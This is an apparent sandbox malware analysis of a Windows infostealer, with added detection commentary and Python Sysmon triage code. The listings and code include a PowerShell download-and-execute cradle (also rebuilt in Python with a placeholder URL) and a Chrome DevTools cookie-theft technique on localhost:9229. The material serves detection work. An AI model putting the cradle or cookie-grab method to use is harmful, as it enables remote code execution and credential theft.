                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1AD91
                            • lstrlen.KERNEL32(0187EA20), ref: 00B1ADA7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1ADCF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B1ADDA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1AE03
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1AE3F
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B1AE49
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1AE6F
                            • lstrlen.KERNEL32(00000000), ref: 00B1AE85
                            • lstrcpy.KERNEL32(00000000,0187EC48), ref: 00B1AEB8
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen
                            • String ID: f
                            • API String ID: 2762123234-1993550816
                            • Opcode ID: 3e68f2e7c31fc7a1d414c1750f8d9c8b534a3e9ab568400d632ad72c1b77e32c
                            • Instruction ID: 4d530c712ad324fa03bc1721a9dfa5ac6cfc8e1ed62b3e6f2d83a6e4909fe48f
                            • Opcode Fuzzy Hash: 3e68f2e7c31fc7a1d414c1750f8d9c8b534a3e9ab568400d632ad72c1b77e32c
                            • Instruction Fuzzy Hash: 88B15F31A126169BCB21EB68DC49AAFBBF5FF40300F4404B4B815E7291DB74ED49CBA1
                            APIs
                            • LoadLibraryA.KERNEL32(ws2_32.dll,?,00B172A4), ref: 00B247E6
                            • GetProcAddress.KERNEL32(00000000,connect), ref: 00B247FC
                            • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 00B2480D
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00B2481E
                            • GetProcAddress.KERNEL32(00000000,htons), ref: 00B2482F
                            • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00B24840
                            • GetProcAddress.KERNEL32(00000000,recv), ref: 00B24851
                            • GetProcAddress.KERNEL32(00000000,socket), ref: 00B24862
                            • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00B24873
                            • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00B24884
                            • GetProcAddress.KERNEL32(00000000,send), ref: 00B24895
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                            • API String ID: 2238633743-3087812094
                            • Opcode ID: 148b24d65c7e7c67b3f57d10d6c1708b5fd22dee9e60f1d3df58f57e4c8b3302
                            • Instruction ID: 1679140009b949aa2fee2d941b3c2e22bc4e002acf4b1b3de87644c56b898626
                            • Opcode Fuzzy Hash: 148b24d65c7e7c67b3f57d10d6c1708b5fd22dee9e60f1d3df58f57e4c8b3302
                            • Instruction Fuzzy Hash: 53113976962B20AFC3249FB5AD1DA967BF8BA09706718085AF441F2374DBF54000EBB0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1BE53
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1BE86
                            • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00B1BE91
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1BEB1
                            • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 00B1BEBD
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1BEE0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B1BEEB
                            • lstrlen.KERNEL32(')"), ref: 00B1BEF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1BF13
                            • lstrcat.KERNEL32(00000000,')"), ref: 00B1BF1F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1BF46
                            • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00B1BF66
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1BF88
                            • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 00B1BF94
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1BFBA
                            • ShellExecuteEx.SHELL32(?), ref: 00B1C00C
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 4016326548-898575020
                            • Opcode ID: 85be7555b8bb540a60dc45f4983a844d1481b13eb872bc0e463a0f20b5850995
                            • Instruction ID: 3c0519a44a073928f7df8425aac7eac4b2af24f1058bf9c7039bcc5b9bb3a685
                            • Opcode Fuzzy Hash: 85be7555b8bb540a60dc45f4983a844d1481b13eb872bc0e463a0f20b5850995
                            • Instruction Fuzzy Hash: 5D619331A107159BCB21AFB99C8DAEEBFE8EF45300F4404B9F405E3251DB74D94A8BA0
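The function at 00B1BE53 above assembles its PowerShell argument string piecewise with lstrcpy/lstrcat: the prefix `-nop -c "iex(New-Object Net.WebClient).DownloadString('`, then a URL passed in as an argument (it shows up only as `?`/00000000 in the listing, so the real value is not on this page), then the suffix `')"`, and finally hands the 32-bit `C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` path plus that string to ShellExecuteEx. The Python below is an added detection example and is not code from the report or from the sample; it rebuilds the command line from the three fragments the listing shows, then runs a cradle matcher over constructed Sysmon-style process-creation records. The URL, the parent image and all sample events are constructed placeholders, and the matcher deliberately generalizes beyond the literal bytes (case, whitespace, `Invoke-Expression`, the `System.` prefix, either quote style) because the literal string is the part a rebuild of the sample changes most cheaply.

```python
import re
from typing import Dict, Iterable, List, Optional

# Strings the report shows being concatenated at 00B1BE91..00B1BF94.
POWERSHELL_WOW64 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CRADLE_PREFIX = "-nop -c \"iex(New-Object Net.WebClient).DownloadString('"
CRADLE_SUFFIX = "')\""

# Constructed placeholder: the URL argument appears only as "?" / 00000000 in the
# listing, so the real value is not on the report page.
EXAMPLE_URL = "http://example.invalid/stage2.ps1"


def build_cradle(url: str) -> str:
    """Reassemble the PowerShell argument string the way the lstrcat chain does:
    prefix + url + suffix. Used here only to produce realistic test input."""
    return CRADLE_PREFIX + url + CRADLE_SUFFIX


# Match the download-and-execute shape rather than the literal bytes: tolerate case,
# whitespace, the Invoke-Expression long form, the System. prefix and either quote.
CRADLE_RE = re.compile(
    r"(?:iex|invoke-expression)\s*\(\s*new-object\s+(?:system\.)?net\.webclient\s*\)"
    r"\s*\.downloadstring\s*\(\s*['\"]([^'\"]+)['\"]\s*\)",
    re.IGNORECASE,
)


def extract_download_url(command_line: str) -> Optional[str]:
    """Return the URL handed to DownloadString, or None if the line is not a cradle."""
    m = CRADLE_RE.search(command_line)
    return m.group(1) if m else None


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_process_events(events: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    """Flag process-creation records (Sysmon Event ID 1 field names) whose command
    line carries the cradle. Each hit records the URL plus two traits visible in the
    report: the -nop switch and the SysWOW64 PowerShell image, i.e. a 32-bit parent
    launching the 32-bit PowerShell on 64-bit Windows."""
    hits = []
    for ev in events:
        image = ev.get("Image", "")
        if _basename(image) not in ("powershell.exe", "pwsh.exe"):
            continue
        cmd = ev.get("CommandLine", "")
        url = extract_download_url(cmd)
        if url is None:
            continue
        lowered = cmd.lower()
        hits.append({
            "parent": ev.get("ParentImage", ""),
            "url": url,
            "no_profile": "-nop" in lowered or "-noprofile" in lowered,
            "wow64_powershell": "\\syswow64\\" in image.lower(),
        })
    return hits


# Constructed sample events (not from the report): one mirroring the listing, one
# variant with different casing and spacing, and one benign PowerShell launch.
SAMPLE_EVENTS = [
    {"Image": POWERSHELL_WOW64,
     "ParentImage": r"C:\Users\user\Desktop\dropper.exe",
     "CommandLine": POWERSHELL_WOW64 + " " + build_cradle(EXAMPLE_URL)},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -NoProfile -Command \"IEX (New-Object System.Net.WebClient)"
                    ".DownloadString('http://example.invalid/b.ps1')\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Process"},
]


if __name__ == "__main__":
    for hit in triage_process_events(SAMPLE_EVENTS):
        print(hit)
```

The `wow64_powershell` trait is worth keeping as a separate field rather than folding it into the match: on a 64-bit host, legitimate administrative scripts almost always run the System32 PowerShell, so a cradle launched from the SysWOW64 image by a non-shell parent is a stronger signal than the cradle text alone.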
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B2184F
                            • lstrlen.KERNEL32(01867080), ref: 00B21860
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21887
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B21892
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B218C1
                            • lstrlen.KERNEL32(00B34FA0), ref: 00B218D3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B218F4
                            • lstrcat.KERNEL32(00000000,00B34FA0), ref: 00B21900
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B2192F
                            • lstrlen.KERNEL32(01866F10), ref: 00B21945
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B2196C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B21977
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B219A6
                            • lstrlen.KERNEL32(00B34FA0), ref: 00B219B8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B219D9
                            • lstrcat.KERNEL32(00000000,00B34FA0), ref: 00B219E5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21A14
                            • lstrlen.KERNEL32(01867090), ref: 00B21A2A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21A51
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B21A5C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21A8B
                            • lstrlen.KERNEL32(01866F20), ref: 00B21AA1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21AC8
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B21AD3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21B02
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen
                            • String ID:
                            • API String ID: 1049500425-0
                            • Opcode ID: 43bc4b2e8f526617105ce95c3bfc2ab883be52fed5ab1fbe6aeac66d43b9a586
                            • Instruction ID: d95dcff8ffc333f4fa605004dd6b6528e0ff5a1a042b72f97fe7f8c46bb5ad09
                            • Opcode Fuzzy Hash: 43bc4b2e8f526617105ce95c3bfc2ab883be52fed5ab1fbe6aeac66d43b9a586
                            • Instruction Fuzzy Hash: 0D912E716017179FDB209FB9EC98A16B7E8EF54300B1448B8B89AD7391DB74E845CB60
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B14793
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00B147C5
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B14812
                            • lstrlen.KERNEL32(00B34B60), ref: 00B1481D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1483A
                            • lstrcat.KERNEL32(00000000,00B34B60), ref: 00B14846
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1486B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B14898
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B148A3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B148CA
                            • StrStrA.SHLWAPI(?,00000000), ref: 00B148DC
                            • lstrlen.KERNEL32(?), ref: 00B148F0
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B14931
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B149B8
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B149E1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B14A0A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B14A30
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B14A5D
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 4107348322-3310892237
                            • Opcode ID: 746f3f250101fdff82e8cb3d72178fc28262b78ebbf422d13367466401ea76cf
                            • Instruction ID: 019ad1f147ae14648dbf8d68a6d44f29c6be2d7410a303a866e0a8eb7296ae4e
                            • Opcode Fuzzy Hash: 746f3f250101fdff82e8cb3d72178fc28262b78ebbf422d13367466401ea76cf
                            • Instruction Fuzzy Hash: EDB18C71A116069BCB21EF78D8899AE7BE9EF44700F4545B8F846E7391DB30EC498B90
                            APIs
                              • Part of subcall function 00B090C0: InternetOpenA.WININET(00B2CFEC,00000001,00000000,00000000,00000000), ref: 00B090DF
                              • Part of subcall function 00B090C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00B090FC
                              • Part of subcall function 00B090C0: InternetCloseHandle.WININET(00000000), ref: 00B09109
                            • strlen.MSVCRT ref: 00B092E1
                            • strlen.MSVCRT ref: 00B092FA
                              • Part of subcall function 00B08980: std::_Xinvalid_argument.LIBCPMT ref: 00B08996
                            • strlen.MSVCRT ref: 00B09399
                            • strlen.MSVCRT ref: 00B093E6
                            • lstrcat.KERNEL32(?,cookies), ref: 00B09547
                            • lstrcat.KERNEL32(?,00B31794), ref: 00B09559
                            • lstrcat.KERNEL32(?,?), ref: 00B0956A
                            • lstrcat.KERNEL32(?,00B34B98), ref: 00B0957C
                            • lstrcat.KERNEL32(?,?), ref: 00B0958D
                            • lstrcat.KERNEL32(?,.txt), ref: 00B0959F
                            • lstrlen.KERNEL32(?), ref: 00B095B6
                            • lstrlen.KERNEL32(?), ref: 00B095DB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B09614
                            Similarity
                            • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                            • API String ID: 1201316467-3542011879
                            • Opcode ID: 6afb7544c1455efccdad3cfcc92d1e3758f4674cc440249cf78b01605554b1d8
                            • Instruction ID: 229042db63f061d2aecc81974f244d78eb7a42049079f83bc0d13f67b37056d2
                            • Opcode Fuzzy Hash: 6afb7544c1455efccdad3cfcc92d1e3758f4674cc440249cf78b01605554b1d8
                            • Instruction Fuzzy Hash: A9E10471E10218DBDF14DFA8D884ADEBBF5BF48300F1044A9E509A7291EB75AE49CF90
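The function at 00B092E1 above, through its subcall at 00B090C0, fetches `http://localhost:9229/json` with WinINet and carries the strings `ws://localhost:9229` and `/devtools`, then builds an output name from `cookies`, a separator, a per-target value and `.txt`. That is the shape of a Chrome DevTools Protocol client: a Chromium browser started with remote debugging on port 9229 lists its debuggable targets at `/json`, each with a `webSocketDebuggerUrl` of the form `ws://localhost:9229/devtools/page/<id>`, and a client on that socket can ask the live browser for its cookies instead of decrypting the on-disk cookie store. Neither the browser launch nor the DevTools method used is visible in this listing. The Python below is an added example, not code from the report or from the sample: it parses a constructed `/json` reply the way such a client has to, and runs two Sysmon-style checks for the surrounding behaviour. The browser image names, the `--remote-debugging-port` and `--headless` launch switches, and all sample events are assumptions or constructed data rather than values taken from the page.

```python
import json
import re
from typing import Dict, List

# Values visible in the listing: the target list is fetched from
# http://localhost:9229/json and the WebSocket side is ws://localhost:9229 + /devtools.
DEVTOOLS_PORT = 9229

# Assumption: Chromium-family browser image names. The report shows the port and the
# endpoint paths but not which browser this function is aimed at.
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe",
                  "vivaldi.exe", "chromium.exe"}

# Assumption: the launch switch a client needs the browser to have been started with;
# it is a documented Chromium flag but does not appear in this function's listing.
REMOTE_DEBUG_FLAG = re.compile(r"--remote-debugging-port(?:=|\s+)(\d+)", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_devtools_targets(body: str) -> List[Dict[str, str]]:
    """Parse the JSON array served at /json. Each entry names one debuggable target
    and the webSocketDebuggerUrl a client must open to drive it."""
    out = []
    for entry in json.loads(body):
        out.append({
            "id": entry.get("id", ""),
            "type": entry.get("type", ""),
            "url": entry.get("url", ""),
            "ws": entry.get("webSocketDebuggerUrl", ""),
        })
    return out


def browser_targets(targets: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Keep only Chromium targets, whose ws URL contains /devtools/. Port 9229 is also
    Node's default inspector port and a Node inspector answers /json as well, but its
    entries are type "node" with no /devtools/ path, so they are filtered out."""
    return [t for t in targets if t["type"] != "node" and "/devtools/" in t["ws"]]


def triage(process_events: List[Dict[str, str]],
           network_events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Two checks over Sysmon-shaped records: a browser spawned with remote debugging
    by a non-browser parent (Event ID 1 fields), and a non-browser process connecting
    to the loopback debugging port (Event ID 3 fields)."""
    findings = []
    for ev in process_events:
        m = REMOTE_DEBUG_FLAG.search(ev.get("CommandLine", ""))
        if not m:
            continue
        image = _basename(ev.get("Image", ""))
        parent = _basename(ev.get("ParentImage", ""))
        if image in BROWSER_IMAGES and parent not in BROWSER_IMAGES:
            findings.append({"rule": "browser_spawned_with_remote_debugging",
                             "port": int(m.group(1)),
                             "parent": ev.get("ParentImage", "")})
    for ev in network_events:
        if (ev.get("DestinationIp") in ("127.0.0.1", "::1")
                and int(ev.get("DestinationPort", 0)) == DEVTOOLS_PORT
                and _basename(str(ev.get("Image", ""))) not in BROWSER_IMAGES):
            findings.append({"rule": "non_browser_client_on_devtools_port",
                             "image": ev.get("Image", "")})
    return findings


# Constructed sample data (not captured from the sample): a /json reply with one
# Chromium page target and one Node inspector target, then Sysmon-shaped events.
SAMPLE_JSON = json.dumps([
    {"id": "A1B2", "type": "page", "title": "New Tab", "url": "chrome://newtab/",
     "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/A1B2"},
    {"id": "c3d4", "type": "node", "title": "app.js", "url": "file:///app.js",
     "webSocketDebuggerUrl": "ws://127.0.0.1:9229/c3d4"},
])
SAMPLE_PROCESS_EVENTS = [
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Users\user\Desktop\dropper.exe",
     "CommandLine": "chrome.exe --headless --remote-debugging-port=9229 "
                    "--user-data-dir=\"C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\""},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\""},
]
SAMPLE_NETWORK_EVENTS = [
    {"Image": r"C:\Users\user\Desktop\dropper.exe", "DestinationIp": "127.0.0.1",
     "DestinationPort": 9229},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
]


if __name__ == "__main__":
    for t in browser_targets(parse_devtools_targets(SAMPLE_JSON)):
        print("target", t["id"], t["ws"])
    for f in triage(SAMPLE_PROCESS_EVENTS, SAMPLE_NETWORK_EVENTS):
        print(f)
```

The loopback rule on its own will also fire on a developer's editor attaching to a Node inspector, since Node listens on the same default port; in practice pair it with the process-tree rule (a browser child of a non-browser parent carrying the remote-debugging switch) or with the browser's own parent chain before treating it as cookie theft.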
                            APIs
                            • memset.MSVCRT ref: 00B1D9A1
                            • memset.MSVCRT ref: 00B1D9B3
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00B1D9DB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1DA0E
                            • lstrcat.KERNEL32(?,00000000), ref: 00B1DA1C
                            • lstrcat.KERNEL32(?,0187EE88), ref: 00B1DA36
                            • lstrcat.KERNEL32(?,?), ref: 00B1DA4A
                            • lstrcat.KERNEL32(?,0187D178), ref: 00B1DA5E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1DA8E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00B1DA95
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B1DAFE
                            Similarity
                            • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2367105040-0
                            • Opcode ID: 672da0345e9b1d9e9429d4aad42b262c4f8c92d89fd6838d6978099b039d8b18
                            • Instruction ID: 583114b58f63d6c1b388e839671a27e3fc4890b3612bfde802973b09e3000ccd
                            • Opcode Fuzzy Hash: 672da0345e9b1d9e9429d4aad42b262c4f8c92d89fd6838d6978099b039d8b18
                            • Instruction Fuzzy Hash: 0BB18F719102599BDB10EFA4DC989EEBBF9FF48300F5449A4F906E7250DB309E49CBA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0B330
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0B37E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0B3A9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0B3B1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0B3D9
                            • lstrlen.KERNEL32(00B34C50), ref: 00B0B450
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0B474
                            • lstrcat.KERNEL32(00000000,00B34C50), ref: 00B0B480
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0B4A9
                            • lstrlen.KERNEL32(00000000), ref: 00B0B52D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0B557
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0B55F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0B587
                            • lstrlen.KERNEL32(00B34AD4), ref: 00B0B5FE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0B622
                            • lstrcat.KERNEL32(00000000,00B34AD4), ref: 00B0B62E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0B65E
                            • lstrlen.KERNEL32(?), ref: 00B0B767
                            • lstrlen.KERNEL32(?), ref: 00B0B776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0B79E
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: 3ba0957edc987c7e371d57afb08fb4052475ab6f6d3574c3c3e8cd64ac0974c1
                            • Instruction ID: 5375c47d3bde4d2bc239631daf8c305a12b71391bead6693386f2c2764677614
                            • Opcode Fuzzy Hash: 3ba0957edc987c7e371d57afb08fb4052475ab6f6d3574c3c3e8cd64ac0974c1
                            • Instruction Fuzzy Hash: 1D021A30A013068FCB25DF69D999A6ABBF5EF44304F1980E9E409DB3A1DB75DC46CB90
                            APIs
                              • Part of subcall function 00B271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00B271FE
                            • RegOpenKeyExA.ADVAPI32(?,0187B3D8,00000000,00020019,?), ref: 00B237BD
                            • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00B237F7
                            • wsprintfA.USER32 ref: 00B23822
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00B23840
                            • RegCloseKey.ADVAPI32(?), ref: 00B2384E
                            • RegCloseKey.ADVAPI32(?), ref: 00B23858
                            • RegQueryValueExA.ADVAPI32(?,0187EC18,00000000,000F003F,?,?), ref: 00B238A1
                            • lstrlen.KERNEL32(?), ref: 00B238B6
                            • RegQueryValueExA.ADVAPI32(?,0187EBE8,00000000,000F003F,?,00000400), ref: 00B23927
                            • RegCloseKey.ADVAPI32(?), ref: 00B23972
                            • RegCloseKey.ADVAPI32(?), ref: 00B23989
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 13140697-3278919252
                            • Opcode ID: 74be6a28a27f5e6eee86bcfc0a74572a41f79ce73181e5d0815cd9b96974b579
                            • Instruction ID: 9983637c7414544571b406fba7733916010a2cbcfc013bf95a4687bea5787332
                            • Opcode Fuzzy Hash: 74be6a28a27f5e6eee86bcfc0a74572a41f79ce73181e5d0815cd9b96974b579
                            • Instruction Fuzzy Hash: D8918C729002189FCB10DF94ED849EEB7F9FB48710F1485A9F509AB251DB35AE46CFA0
                            APIs
                            • InternetOpenA.WININET(00B2CFEC,00000001,00000000,00000000,00000000), ref: 00B090DF
                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00B090FC
                            • InternetCloseHandle.WININET(00000000), ref: 00B09109
                            • InternetReadFile.WININET(?,?,?,00000000), ref: 00B09166
                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00B09197
                            • InternetCloseHandle.WININET(00000000), ref: 00B091A2
                            • InternetCloseHandle.WININET(00000000), ref: 00B091A9
                            • strlen.MSVCRT ref: 00B091BA
                            • strlen.MSVCRT ref: 00B091ED
                            • strlen.MSVCRT ref: 00B0922E
                            • strlen.MSVCRT ref: 00B0924C
                              • Part of subcall function 00B08980: std::_Xinvalid_argument.LIBCPMT ref: 00B08996
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                            • API String ID: 1530259920-2144369209
                            • Opcode ID: 195bcc2e184bb0781c3bff502de87ebd33a36593d68b429511cb092a604bbd7c
                            • Instruction ID: 79ea5f38de254e2e4ead99ff9934f502a0a3b8be248a4a5282777bc4e4d3c57d
                            • Opcode Fuzzy Hash: 195bcc2e184bb0781c3bff502de87ebd33a36593d68b429511cb092a604bbd7c
                            • Instruction Fuzzy Hash: FE51A271640305ABD720DBA8DC45FEEFBF9DF48710F1401A9F905E3291EBB4AA4987A1
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00B216A1
                            • lstrcpy.KERNEL32(00000000,0186A550), ref: 00B216CC
                            • lstrlen.KERNEL32(?), ref: 00B216D9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B216F6
                            • lstrcat.KERNEL32(00000000,?), ref: 00B21704
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B2172A
                            • lstrlen.KERNEL32(0187E4E8), ref: 00B2173F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B21762
                            • lstrcat.KERNEL32(00000000,0187E4E8), ref: 00B2176A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B21792
                            • ShellExecuteEx.SHELL32(?), ref: 00B217CD
                            • ExitProcess.KERNEL32 ref: 00B21803
                            Strings
                            Memory Dump Source
